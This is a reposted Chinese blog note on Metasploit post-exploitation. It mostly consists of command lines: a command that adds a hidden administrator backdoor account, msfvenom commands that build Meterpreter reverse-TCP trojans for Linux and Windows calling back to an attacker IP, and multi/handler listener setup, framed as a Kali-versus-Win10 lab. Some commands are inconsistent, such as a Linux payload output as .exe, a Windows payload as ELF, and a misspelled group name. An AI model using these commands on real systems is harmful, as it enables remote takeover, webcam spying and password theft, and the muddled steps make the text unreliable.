1.meterpreter 攻击成功后可以做什么指令?
远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统。
net user zhangsan 123456/add && net localgroup adminstrators zhangsan/add
①reverse_tcp是一个基于TCP的反向链接反弹shell, 使用起来很稳定:
msf>use exploit/multi/handler
msf exploit(multi/handler)>set payload linux/x86/meterpreter/reverse_tcp
【报错】msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf –o shell
【正确】msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell
然后我们打开Metasploit,使用模块handler,设置payload,注意:这里设置的payload要和我们生成木马所使用的payload一样。
chmod +x:增加可执行权限,在root权限下设置,否则会报错)
【报错】msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe –o shell.exe
【正确】msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe
set payload linux/x86/meterpreter/reverse_tcp
set lport 10002
注:
重来!
=============================================================================
攻击机:kali linux x64
目标机:win10 x64
步骤:
②kali
③msfvenom -a x64 –platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell
④msfvenom -a x64 –platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe
⑦set payload windows/x64/meterpreter/reverse_tcp
⑧set LHOST 192.168.195.129
⑨set LPORT 4444
⑩run
【不需要】set RHOSTS 192.168.195.131
原文地址:https://blog.csdn.net/qq_23996157/article/details/134708401
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_25750.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!